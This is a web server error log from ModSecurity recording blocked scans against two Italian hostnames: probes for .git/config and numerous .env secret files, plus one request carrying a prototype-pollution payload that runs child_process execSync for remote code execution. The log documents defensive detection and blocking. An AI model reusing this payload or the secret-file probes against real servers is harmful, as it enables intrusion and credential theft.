[Mon Dec 08 07:05:38.240333 2025] [:error] [pid 594973] [client 167.71.175.236:52186] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTZqsmup1V1Hp6wm7uvsXwAAAAA"]
[Mon Dec 08 07:05:38.240570 2025] [:error] [pid 594973] [client 167.71.175.236:52186] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTZqsmup1V1Hp6wm7uvsXwAAAAA"]
[Mon Dec 08 07:05:38.240734 2025] [:error] [pid 594973] [client 167.71.175.236:52186] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTZqsmup1V1Hp6wm7uvsXwAAAAA"]
[Tue Dec 09 06:57:05.743932 2025] [:error] [pid 616663] [client 185.177.72.75:34540] [client 185.177.72.75] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTe6MRk3NKbQ8i87INsc_wAAAAI"]
[Tue Dec 09 06:57:05.744251 2025] [:error] [pid 616663] [client 185.177.72.75:34540] [client 185.177.72.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTe6MRk3NKbQ8i87INsc_wAAAAI"]
[Tue Dec 09 06:57:05.744430 2025] [:error] [pid 616663] [client 185.177.72.75:34540] [client 185.177.72.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTe6MRk3NKbQ8i87INsc_wAAAAI"]
[Tue Dec 09 21:51:22.273944 2025] [:error] [pid 627083] [client 45.148.10.154:50260] [client 45.148.10.154] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTiLyoFBKoAoAjUdsCXsmwAAAAA"]
[Tue Dec 09 21:51:22.274229 2025] [:error] [pid 627083] [client 45.148.10.154:50260] [client 45.148.10.154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTiLyoFBKoAoAjUdsCXsmwAAAAA"]
[Tue Dec 09 21:51:22.274415 2025] [:error] [pid 627083] [client 45.148.10.154:50260] [client 45.148.10.154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTiLyoFBKoAoAjUdsCXsmwAAAAA"]
[Tue Dec 09 21:51:24.714926 2025] [:error] [pid 616664] [client 45.148.10.154:50270] [client 45.148.10.154] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTiLzLA0yIwbR96rbbSc6gAAAAM"]
[Tue Dec 09 21:51:24.715192 2025] [:error] [pid 616664] [client 45.148.10.154:50270] [client 45.148.10.154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTiLzLA0yIwbR96rbbSc6gAAAAM"]
[Tue Dec 09 21:51:24.715354 2025] [:error] [pid 616664] [client 45.148.10.154:50270] [client 45.148.10.154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTiLzLA0yIwbR96rbbSc6gAAAAM"]
[Wed Dec 10 06:21:37.172255 2025] [:error] [pid 637204] [client 52.28.22.28:59932] [client 52.28.22.28] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTkDYetcX02MNS9MxJgQwQAAAAk"]
[Wed Dec 10 06:21:37.172832 2025] [:error] [pid 637204] [client 52.28.22.28:59932] [client 52.28.22.28] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTkDYetcX02MNS9MxJgQwQAAAAk"]
[Wed Dec 10 06:21:37.173897 2025] [:error] [pid 637204] [client 52.28.22.28:59932] [client 52.28.22.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTkDYetcX02MNS9MxJgQwQAAAAk"]
[Wed Dec 10 06:21:37.174083 2025] [:error] [pid 637204] [client 52.28.22.28:59932] [client 52.28.22.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTkDYetcX02MNS9MxJgQwQAAAAk"]
[Wed Dec 10 07:46:31.088896 2025] [:error] [pid 636979] [client 45.148.10.247:37908] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTkXR0gy26Zu7JFzi64JewAAAAY"]
[Wed Dec 10 07:46:31.089132 2025] [:error] [pid 636979] [client 45.148.10.247:37908] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTkXR0gy26Zu7JFzi64JewAAAAY"]
[Wed Dec 10 07:46:31.089301 2025] [:error] [pid 636979] [client 45.148.10.247:37908] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTkXR0gy26Zu7JFzi64JewAAAAY"]
[Wed Dec 10 07:46:41.060539 2025] [:error] [pid 636951] [client 45.148.10.247:42042] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTkXUdk209adLJ1hacVSXQAAAAU"]
[Wed Dec 10 07:46:41.060778 2025] [:error] [pid 636951] [client 45.148.10.247:42042] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTkXUdk209adLJ1hacVSXQAAAAU"]
[Wed Dec 10 07:46:41.060956 2025] [:error] [pid 636951] [client 45.148.10.247:42042] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTkXUdk209adLJ1hacVSXQAAAAU"]
[Wed Dec 10 07:46:44.168215 2025] [:error] [pid 636937] [client 45.148.10.247:42050] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTkXVDUxBGP994kD0xgwXgAAAAI"]
[Wed Dec 10 07:46:44.168506 2025] [:error] [pid 636937] [client 45.148.10.247:42050] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTkXVDUxBGP994kD0xgwXgAAAAI"]
[Wed Dec 10 07:46:44.168691 2025] [:error] [pid 636937] [client 45.148.10.247:42050] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTkXVDUxBGP994kD0xgwXgAAAAI"]
[Wed Dec 10 07:46:49.098800 2025] [:error] [pid 636938] [client 45.148.10.247:42052] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXWUcYaZQwDd7_nrtnTgAAAAM"]
[Wed Dec 10 07:46:49.099037 2025] [:error] [pid 636938] [client 45.148.10.247:42052] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXWUcYaZQwDd7_nrtnTgAAAAM"]
[Wed Dec 10 07:46:49.099211 2025] [:error] [pid 636938] [client 45.148.10.247:42052] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXWUcYaZQwDd7_nrtnTgAAAAM"]
[Wed Dec 10 07:46:52.650760 2025] [:error] [pid 636935] [client 45.148.10.247:40858] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXXGHv40YZWlW-27907QAAAAA"]
[Wed Dec 10 07:46:52.651056 2025] [:error] [pid 636935] [client 45.148.10.247:40858] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXXGHv40YZWlW-27907QAAAAA"]
[Wed Dec 10 07:46:52.651303 2025] [:error] [pid 636935] [client 45.148.10.247:40858] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTkXXGHv40YZWlW-27907QAAAAA"]
[Wed Dec 10 07:46:57.741990 2025] [authz_core:error] [pid 637204] [client 45.148.10.247:35612] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Dec 10 07:47:15.215059 2025] [authz_core:error] [pid 637201] [client 45.148.10.247:39798] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Dec 10 07:47:22.596734 2025] [authz_core:error] [pid 636936] [client 45.148.10.247:60646] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Dec 10 07:47:26.742805 2025] [authz_core:error] [pid 636951] [client 45.148.10.247:60656] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Dec 10 07:47:27.765710 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTkXf0cYaZQwDd7_nrtnTwAAAAM"]
[Wed Dec 10 07:47:27.766003 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTkXf0cYaZQwDd7_nrtnTwAAAAM"]
[Wed Dec 10 07:47:27.766869 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTkXf0cYaZQwDd7_nrtnTwAAAAM"]
[Wed Dec 10 07:47:29.756004 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTkXgUcYaZQwDd7_nrtnUAAAAAM"]
[Wed Dec 10 07:47:29.756255 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTkXgUcYaZQwDd7_nrtnUAAAAAM"]
[Wed Dec 10 07:47:29.756438 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTkXgUcYaZQwDd7_nrtnUAAAAAM"]
[Wed Dec 10 07:47:29.789113 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTkXgUcYaZQwDd7_nrtnUQAAAAM"]
